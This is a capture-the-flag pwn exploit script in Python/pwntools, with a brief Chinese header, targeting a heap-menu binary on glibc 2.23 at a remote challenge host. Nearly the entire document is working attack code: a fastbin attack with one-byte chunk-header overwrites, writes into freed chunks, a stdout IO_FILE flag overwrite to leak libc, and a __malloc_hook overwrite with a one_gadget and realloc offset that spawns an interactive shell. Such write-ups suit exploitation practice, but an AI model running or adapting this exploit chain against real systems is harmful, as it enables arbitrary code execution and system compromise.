glibc 版本为 2.23-0ubuntu11.3
题目利用 fastbin attack 和 IO_FILE 泄漏地址
最后还需要通过 realloc 调整栈
from pwn import *
from LibcSearcher import*
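context(arch = 'amd64', os = 'linux', log_level = 'debug')
context.terminal = ['tmux','splitw','-h']
# Open exactly one target connection.  The original spawned a local
# `process('./pwn')` and then immediately rebound `io` to the remote socket,
# leaving an orphaned child process (and its stdio pipes) alive for the whole
# run.  Keep the alternatives commented out and enable only the one in use.
#io = process('./pwn')
#io = remote('59.110.164.72', 10066)
io = remote("node4.anna.nssctf.cn",28529)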
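# Thin wrappers around the pwntools tube `io`.  Plain `def`s instead of
# name-bound lambdas (PEP 8 / ruff E731) so each one carries a docstring and a
# proper name in tracebacks; names and call signatures are unchanged.
def s(content):
    """Send *content* to the target verbatim (no newline appended)."""
    return io.send(content)
def sl(content):
    """Send *content* followed by a newline."""
    return io.sendline(content)
def sa(content, send):
    """Wait until *content* has been received, then send *send*."""
    return io.sendafter(content, send)
def sla(content, send):
    """Wait until *content* has been received, then send *send* plus a newline."""
    return io.sendlineafter(content, send)
def rc(number):
    """Receive up to *number* bytes from the target."""
    return io.recv(number)
def ru(content):
    """Receive until *content* is seen; returns everything read including it."""
    return io.recvuntil(content)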
def slog(name, address):
    """Print ``[+] name==>0x...`` using the ANSI colours this script uses for leaks."""
    colour_on = "\033[40;31m[+]\033[40;35m"
    colour_off = "\033[0m"
    print(f"{colour_on}{name}==>{hex(address)}{colour_off}")
def debug():
    """Attach gdb to the live tube `io` (uses context.terminal for the window)."""
    target = io
    gdb.attach(target)
def get_address():
    """Read up to the next 0x7f byte and unpack the trailing 6 bytes as a little-endian u64.

    The 6 bytes are zero-padded on the right to 8 before unpacking; the
    0x7f terminator itself is the last of the 6.
    """
    received = ru(b'\x7f')
    tail = received[-6:]
    padded = tail.ljust(8, b'\x00')
    return u64(padded)
def add(index, size): #0x2d
    """Menu option 1: allocate slot *index* with *size* bytes (prompt-driven)."""
    option = '1'
    sla(b">> ", option)
    sla(b"index:", str(index))
    sla(b'size:', str(size))
def delete(index):
    """Menu option 2: free slot *index*."""
    option = '2'
    sla(b'>> ', option)
    sla("index:", str(index))
def edit(index, content):
    """Menu option 3: write *content* into slot *index* (after the 'context:' prompt)."""
    option = '3'
    sla(b">> ", option)
    sla(b'index:', str(index))
    sla(b'context:', content)
# ---- leak stage -------------------------------------------------------------
# Menu option 666 makes the program print an address.  The script skips to the
# "0x" prefix and parses exactly 6 hex digits; this assumes the program prints
# the value in that width -- TODO confirm against the binary, a wrong width
# silently corrupts every derived address below.
sla(b'>> \n', '666')
ru('0x')
printf_addr = int(rc(6), 16)
slog("printf_addr", printf_addr)
# Every hard-coded offset in this run (0x1f0+0x43, 0x3c56a3, the one_gadget
# list, realloc+13) is specific to this exact libc build and does not carry
# over to any other build.
libc = ELF("../tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6")
# Only the low 16 bits are derived here; they are written with p16 further down.
stdout_2 = (printf_addr - 0x1f0 - 0x43)%0x10000
slog("stdout_2", stdout_2)
# ---- heap stage (fastbin attack, see header note) ---------------------------
# The allocate/free/edit order below is the exploit itself; it must not be
# reordered.  Note the script edits slot 3 after delete(3) and slot 8 after
# delete(8), i.e. it relies on the target allowing writes to freed entries.
add(0, 0x18)
add(1, 0x28)
add(2, 0x18)
add(3, 0x68)
add(4, 0x18)
edit(0, b'\x00'*0x18+ b'\xc1')   # one byte past the 0x18 payload -- presumably lands in a neighbouring chunk header; confirm layout
delete(3)
delete(1)
add(5, 0x48)
edit(2, b'\x00'*0x18 + b'\x71')   # same one-byte-past pattern as above
edit(3, p16(stdout_2))            # write into the freed slot 3 (see note above)
add(6, 0x68)
add(7, 0x68)
# ---- IO_FILE leak stage (see header note) ------------------------------------
# 0xfbad1800 is the flags constant this technique relies on; its effect is not
# verifiable from this script alone.
edit(7, b'\x00'*0x33 + p64(0xfbad1800) + p64(0)*3 + b'\x50')
# 0x3c56a3 is a build-specific offset between the leaked pointer and libc base;
# check it against the ELF loaded above rather than trusting it.
libc_base = get_address() - 0x3c56a3
slog("libc_base", libc_base)
add(8, 0x68)
delete(8)
malloc_hook = libc_base + libc.sym['__malloc_hook']
slog("malloc_hook", malloc_hook)
edit(8, p64(malloc_hook - 0x18 + 0xd - 0x18))   # net offset: __malloc_hook - 0x23
add(1, 0x68)
add(2, 0x68)
# Constants from one_gadget for this libc build; index 1 (0x4527a) is used.
one_gadget = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
shell = libc_base + one_gadget[1]
realloc = libc_base + libc.sym['realloc']
# Per the header note, realloc is used to adjust the stack before the gadget
# runs; +13 is an entry offset specific to this build -- confirm.
edit(2, b'\x00'*0xb + p64(shell) + p64(realloc + 13))
add(3, 0x10)   # final allocation that triggers the hooked path -- presumably; confirm
io.interactive()
